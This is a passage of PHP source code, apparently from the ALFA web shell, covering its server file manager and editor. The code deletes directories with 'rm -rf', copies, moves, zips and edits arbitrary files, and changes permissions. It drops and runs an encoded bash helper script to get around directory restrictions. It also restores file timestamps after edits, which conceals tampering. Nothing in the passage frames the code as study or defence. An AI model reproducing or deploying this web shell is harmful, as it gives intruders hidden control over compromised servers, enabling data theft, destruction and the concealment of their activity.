2689@unlink($f);
2690}
2691}
2692if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
2693deleteDir(rawurldecode(@$_POST['alfa2']));
2694alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
2695}else{
2696@unlink(rawurldecode(@$_POST['alfa2']));
2697}
2698if($GLOBALS["glob_chdir_false"]){
2699 $source = rawurldecode(@$_POST['alfa2']);
2700 if($source!='..'&&!empty($source)){
2701 if(_alfa_can_runCommand(true,true)){
2702 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
2703 }
2704 }
2705}
2706if(is_array($_POST['f']))
2707return;
2708break;
2709case 'paste':
2710if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){
2711foreach($_COOKIE['alfa_f'] as $f)
2712copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);
2713}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){
2714function move_paste($c,$s,$d){
2715if(@is_dir($c.$s)){
2716@mkdir($d.$s);
2717$h = @opendir($c.$s);
2718while (($f = @readdir($h)) !== false)
2719if(($f != ".") and ($f != ".."))
2720copy_paste($c.$s.'/',$f, $d.$s.'/');
2721}elseif(@is_file($c.$s))
2722@copy($c.$s, $d.$s);
2723}
2724foreach($_COOKIE['alfa_f'] as $f)
2725@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);
2726}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){
2727if(class_exists('ZipArchive')){
2728$zip = new ZipArchive();
2729$zipX = "alfa_".rand(1,1000).".zip";
2730if($zip->open($zipX, 1)){
2731@chdir($_COOKIE['alfa_c']);
2732foreach($_COOKIE['alfa_f'] as $f){
2733if($f == '..')continue;
2734if(@is_file($_COOKIE['alfa_c'].$f))
2735$zip->addFile($_COOKIE['alfa_c'].$f, $f);
2736elseif(@is_dir($_COOKIE['alfa_c'].$f)){
2737$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
2738foreach($iterator as $key=>$value){
2739$key = str_replace('\\','/',realpath($key));
2740if(@is_dir($key)){
2741if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
2742}else{$zip->addFile($key,$key);}}}}
2743@chdir($GLOBALS['cwd']);
2744$zip->close();
2745__alert('>> '.$zipX.' << is created...');}}
2746}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){
2747if(class_exists('ZipArchive')){
2748$zip = new ZipArchive();
2749foreach($_COOKIE['alfa_f'] as $f) {
2750if($zip->open($_COOKIE['alfa_c'].$f)){
2751$zip->extractTo($_COOKIE['alfa_cwd']);
2752$zip->close();}}}}
2753unset($_COOKIE['alfa_f']);
2754break;
2755default:
2756if(!empty($_POST['alfa1'])){
2757if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){
2758__alfa_set_cookie('alfa_act', @$_POST['alfa1']);
2759__alfa_set_cookie('alfa_f', @serialize($_POST['f']));
2760__alfa_set_cookie('alfa_c', @$_POST['c']);
2761return;
2762}
2763}
2764break;
2765}
2766}
2767$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
2768if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
2769 $path = explode('/', $res[1]);
2770 array_pop($path);
2771 $_POST['c'] = implode('/', $path);
2772}
2773$cmd_dir = false;
2774if($dirContent === false){
2775 if(_alfa_can_runCommand(true,true)){
2776 $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];
2777 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2778 if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){
2779 $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";
2780 $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);
2781 __alfa_set_cookie("alfachdir_bash", "true");
2782 __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);
2783 }
2784 $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");
2785 $dirContent = json_decode($dirContent, true);
2786 if(is_array($dirContent)){
2787 array_pop($dirContent);
2788 $cmd_dir = true;
2789 }else{
2790 $dirContent = false;
2791 }
2792 }
2793}
2794alfahead();
2795AlfaNum(8,9,10,7,6,5,4);
2796$count_dirContent = @count($dirContent);
2797if($count_dirContent > 300){
2798 @$_COOKIE["alfa_limited_files"] = 100;
2799}
2800$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';
2801$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;
2802$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;
2803$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';
2804$files_page_count = 1;
2805if($alfa_limited_files > 0){
2806 $files_page_count = ceil($count_dirContent/$alfa_limited_files);
2807 if($files_page_count > 1){
2808 $files_page_count++;
2809 }
2810}
2811echo '<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\'alfa_sort_by\');" style="color:#25ff00;"><option value="name" '.($alfa_sort_by == 'name'?'selected':'').'>Name</option><option value="size" '.($alfa_sort_by == 'size'?'selected':'').'>Size</option><option value="modify" '.($alfa_sort_by == 'modify'?'selected':'').'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\'alfa_filesman_direction\')" style="color:#25ff00;"><option value="asc" '.($alfa_filesman_direction == 'asc'?'selected':'').'>Ascending</option><option value="desc" '.($alfa_filesman_direction == 'desc'?'selected':'').'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="'.$alfa_limited_files.'" oninput="this.value=this.value.replace(/[^0-9]/g,\'\');setCookie(\'alfa_limited_files\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">'.($count_dirContent-1).'</b></span></div><div class="header">';
2812if($dirContent == false){
2813echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
2814alfaFooter();
2815return;
2816}
2817global $sort;
2818$sort = array('name', 1);
2819if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){
2820 $sort[0] = $_COOKIE["alfa_sort_by"];
2821}
2822if(!empty($_POST['alfa1'])) {
2823if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
2824$sort = array($match[1], (int)$match[2]);
2825}
2826if($alfa_files_page_number > ($files_page_count-1)){
2827 $alfa_files_page_number = 1;
2828}
2829$checkbox_rand = rand(11111, 99999);
2830echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table id='filemanager_table' width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk".$checkbox_rand."' onclick='checkBox(this);' class='chkbx'><label for='mchk".$checkbox_rand."'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
2831$dirs = $files = array();
2832$n = $count_dirContent;
2833if($n > $alfa_limited_files && $alfa_limited_files > 0){
2834 $n = ($alfa_limited_files * $alfa_files_page_number);
2835 if($n > $count_dirContent){
2836 $n = $count_dirContent;
2837 }
2838}
2839$i = 0;
2840if($alfa_limited_files > 0 && $alfa_files_page_number > 1){
2841 $i = $alfa_limited_files * ($alfa_files_page_number - 1);
2842}
2843$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);
2844$cmd_dir_backp = "";
2845for(;$i<$n;$i++){
2846if($cmd_dir){
2847$filename = $dirContent[$i]["name"];
2848$file_owner = $dirContent[$i]["owner"];
2849$file_group = $dirContent[$i]["group"];
2850$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
2851$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
2852$file_size = $dirContent[$i]["size"];
2853if(substr($dirContent[$i]["name"], 0 ,1) == "/"){
2854$file_path = $dirContent[$i]["name"];
2855$dirContent[$i]["name"] = "..";
2856$filename = $dirContent[$i]["name"];
2857}else{
2858$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];
2859}
2860}else{
2861$filename = $dirContent[$i];
2862$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
2863$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
2864$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
2865$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
2866$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
2867$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
2868$file_size = @filesize($GLOBALS['cwd'].$filename);
2869$file_path = $GLOBALS['cwd'].$filename;
2870}
2871$tmp = array('name' => $filename,
2872'path' => $file_path,
2873'modify' => $file_modify,
2874'perms' => $file_perm,
2875'size' => $file_size,
2876'owner' => $file_owner,
2877'group' => $file_group
2878);
2879if($filename == ".." && !$cmd_dir){
2880 $tmp["path"] = str_replace("\\", "/", realpath($file_path));
2881}
2882if(!$cmd_dir){
2883if(@is_file($file_path)){
2884$arr_mrg = array('type' => 'file');
2885if(@is_link($file_path)){
2886$arr_mrg["link"] = readlink($tmp['path']);
2887}
2888$files[] = array_merge($tmp, $arr_mrg);
2889}elseif(@is_link($file_path)){
2890$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
2891}elseif(@is_dir($file_path)&& ($filename != ".")){
2892$dirs[] = array_merge($tmp, array('type' => 'dir'));
2893}
2894}else{
2895 if($dirContent[$i]["type"]=="file"){
2896 $files[] = array_merge($tmp, array('type' => 'file'));
2897 }else{
2898 if($dirContent[$i]["name"] != "."){
2899 $dirs[] = array_merge($tmp, array('type' => 'dir'));
2900 }
2901 }
2902}
2903}
2904$GLOBALS['sort'] = $sort;
2905function alfaCmp($a, $b) {
2906if($GLOBALS['sort'][0] != 'size')
2907return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
2908else
2909return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
2910}
2911usort($files, "alfaCmp");
2912usort($dirs, "alfaCmp");
2913if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){
2914 if($_COOKIE["alfa_filesman_direction"] == 'desc'){
2915 $files = array_reverse($files);
2916 $dirs = array_reverse($dirs);
2917 }
2918}
2919$files = array_merge($dirs, $files);
2920$l=0;
2921$cc=0;
2922foreach($files as $f){
2923$f['name'] = htmlspecialchars($f['name']);
2924$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
2925$checkbox = 'checkbox_'.$checkbox_rand.$cc;
2926$raw_name = rawurlencode($f['name']);
2927$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
2928$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
2929echo '<tr class="fmanager-row" id="tr_row_'.$cc.'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td id="td_row_'.$cc.'">'.$icon.'<div style="'.$style.'"><a row="'.$cc.'" id="id_'.$cc.'" class="main_name" onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');" href="#action=fileman&path='.$GLOBALS['cwd'].'&file='.$raw_name.'" fname="'.$raw_name.'" ftype="file" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'>'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" href="#action=fileman&path='.$f['path'].'" fname="'.$raw_name.'" ftype="folder" path="'.$GLOBALS['cwd'].'" opt_title="'.$f['link'].'" '.(isset($f['link'])?'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"':'').'><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a id="id_chmode_'.$cc.'" href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
2930$f['perms'].'</td><td><a id="id_rename_'.$cc.'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a id="id_touch_'.$cc.'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a id="id_edit_'.$cc.'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a id="id_download_'.$cc.'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a id="id_delete_'.$cc.'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
2931$l = $l?0:1;
2932$cc++;
2933}
2934echo "<tr id='filemanager_last_tr'><td colspan=7>
2935<input type=hidden name=a value='FilesMan'>
2936<input type=hidden name=c value='".htmlspecialchars(($GLOBALS['glob_chdir_false']?$_POST['c']:$GLOBALS['cwd']))."'>
2937<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
2938<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
2939<input type='submit' value=' '>
2940</form></table><div class='pages-holder'><div class='pages-number'>".$page_builder."</div></div></div></div>";
2941alfafooter();
2942}
2943function get_pagination_links($current_page, $total_pages){
2944 $links = "";
2945 if ($total_pages >= 1 && $current_page <= $total_pages) {
2946 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\"><<</a>";
2947 $selected_page = "";
2948 if($current_page == 1){
2949 $selected_page = " active-page-number";
2950 }
2951 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">1</a>";
2952 $i = max(2, $current_page - 5);
2953 if ($i > 2)
2954 $links .= "<a class=\"page-number\">...</a>";
2955 for (; $i < min($current_page + 6, $total_pages); $i++) {
2956 if($i == $current_page){
2957 $selected_page = " active-page-number";
2958 }else{
2959 $selected_page = "";
2960 }
2961 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$i}</a>";
2962 }
2963 if ($i != $total_pages)
2964 $links .= "<a class=\"page-number\">...</a>";
2965 $selected_page = " last-page-number";
2966 if($current_page == $total_pages){
2967 $selected_page .= " active-page-number";
2968 }
2969 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number".$selected_page."\">{$total_pages}</a>";
2970 $links .= "<a onclick=\"pageChangedFilesMan(this);\" class=\"page-number\">>></a>";
2971 }
2972 return $links;
2973}
2974function alfaFilesTools(){
2975alfahead();
2976echo '<div class="filestools" style="height: 100%;">';
2977if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
2978$alfa1_decoded = $_POST['alfa1'];
2979$chdir_fals = false;
2980if(!@chdir($_POST['c'])){
2981 $chdir_fals = true;
2982 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
2983 $alfa_canruncmd = _alfa_can_runCommand(true,true);
2984 if($alfa_canruncmd){
2985 $slashed_alfa1 = addslashes($_POST['alfa1']);
2986 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
2987 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
2988 }
2989}
2990if($_POST['alfa2'] == 'auto'){
2991if(is_array(@getimagesize($_POST['alfa1']))){
2992$_POST['alfa2'] = 'image';
2993}else{
2994 $_POST['alfa2'] = 'view';
2995 if($chdir_fals){
2996 if($alfa_canruncmd){
2997 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
2998 $mimetype = $mime[1];
2999 if(!empty($mimetype)){
3000 if(strstr($mimetype, "image")){
3001 $_POST['alfa2'] = 'image';
3002 }
3003 }
3004 }
3005 }
3006}
3007}
3008if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3009if(@$_POST['alfa2'] == 'mkfile'){
3010$_POST['alfa1'] = trim($_POST['alfa1']);
3011if($chdir_fals&&$alfa_canruncmd){
3012 if(_alfa_is_writable($_POST["c"])){
3013 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3014 $_POST['alfa2'] = "edit";
3015 }
3016}
3017if(!@file_exists($_POST['alfa1'])){
3018$fp = @fopen($_POST['alfa1'], 'w');
3019if($fp){
3020$_POST['alfa2'] = "edit";
3021fclose($fp);
3022}
3023}else{
3024$_POST['alfa2'] = "edit";
3025}
3026}
3027if(!_alfa_file_exists(@$_POST['alfa1'])){
3028echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3029alfaFooter();
3030return;
3031}
3032if($chdir_fals){
3033$filesize = $file_info[3];
3034$uid["name"] = $file_info[1];
3035$gid["name"] = $file_info[2];
3036$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3037}else{
3038$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3039$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3040if(!$uid&&!$gid){
3041$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3042$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3043}
3044$permcolor = alfaPermsColor($_POST['alfa1']);
3045$filesize = @filesize($_POST['alfa1']);
3046if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
3047 if(_alfa_can_runCommand()){
3048 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
3049 }
3050}
3051}
3052if(substr($_POST['alfa1'], 0, 7) == "phar://"){
3053 $alfa_file_directory = $_POST['alfa1'];
3054}else{
3055 $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
3056}
3057echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
3058if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
3059if(!_alfa_is_dir($_POST['alfa1'])){
3060$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
3061$ftype = "file";
3062}else{
3063$m = array('Chmod', 'Rename', 'Touch');
3064$ftype = "dir";
3065}
3066echo('<div>');
3067foreach($m as $v)
3068echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
3069echo '</div>';
3070switch($_POST['alfa2']){
3071case 'view':case 'edit':
3072@chdir($_POST['c']);
3073$disabled_btn = "";
3074if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
3075$disabled_btn = "disabled=disabled";
3076$disabled_btn_style= 'background: #ff0000;color: #fff;';
3077}
3078if(!empty($_POST['alfa3'])){
3079$_POST['alfa3'] = substr($_POST['alfa3'],1);
3080$time = @filemtime($_POST['alfa1']);
3081$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
3082if($chdir_fals&&$alfa_canruncmd){
3083 $rname = $alfa1_decoded;
3084 $randname = $rname.rand(111,9999);
3085 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
3086 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
3087 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
3088 }
3089}
3090if($fp){
3091echo 'Saved!<br>';
3092@touch($_POST['alfa1'],$time,$time);
3093}
3094}
3095echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
3096echo htmlspecialchars(__read_file($_POST['alfa1']));
3097echo '</pre></div></div>';
3098break;
3099case 'highlight':
3100@chdir($_POST['c']);
3101if(@is_readable($_POST['alfa1'])){
3102echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3103$code = @highlight_file($_POST['alfa1'],true);
3104echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
3105}
3106break;
3107case 'delete':
3108@chdir($_POST['c']);
3109if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
3110$deleted = true;
3111if(!@unlink($_POST['alfa1'])){
3112 $deleted = false;
3113 if($alfa_canruncmd){
3114 if(_alfa_is_writable($_POST['alfa1'])){
3115 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
3116 $deleted = true;
3117 }
3118 }
3119}
3120if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
3121break;
3122case 'chmod':
3123@chdir($_POST['c']);
3124if(!empty($_POST['alfa3'])){
3125$perms = 0;
3126for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
3127$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
3128if(!@chmod($_POST['alfa1'], $perms)){
3129if($chdir_fals&&$alfa_canruncmd){
3130alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
3131echo('Success!');
3132}else{
3133echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
3134}else{echo('Success!');}
3135}
3136clearstatcache();
3137AlfaNum(8,9,10,7,6,5,4,2,1);
3138if($chdir_fals){
3139 $file_perm = $file_info[5];
3140}else{
3141 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
3142}
3143echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
3144break;
3145case 'hexdump':
3146@chdir($_POST['c']);
3147$c = __read_file($_POST['alfa1']);
3148$n = 0;
3149$h = array('00000000<br>','','');
3150$len = strlen($c);
3151for ($i=0; $i<$len; ++$i) {
3152$h[1] .= sprintf('%02X',ord($c[$i])).' ';
3153switch ( ord($c[$i]) ) {
3154case 0: $h[2] .= ' '; break;
3155case 9: $h[2] .= ' '; break;
3156case 10: $h[2] .= ' '; break;
3157case 13: $h[2] .= ' '; break;
3158default: $h[2] .= $c[$i]; break;
3159}
3160$n++;
3161if ($n == 32) {
3162$n = 0;
3163if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3164$h[1] .= '<br>';
3165$h[2] .= "\n";
3166}
3167}
3168echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
3169break;
3170case 'rename':
3171@chdir($_POST['c']);
3172$alfa1_escape = addslashes($_POST["alfa1"]);
3173$alfa3_escape = addslashes($_POST["alfa3"]);
3174if(!empty($_POST['alfa3'])){
3175$cmd_rename = false;
3176if($chdir_fals&&$alfa_canruncmd){
3177if(_alfa_is_writable($_POST['alfa1'])){
3178$alfa1_escape = addslashes($alfa1_decoded);
3179alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
3180}else{
3181$cmd_rename = true;
3182}
3183}else{
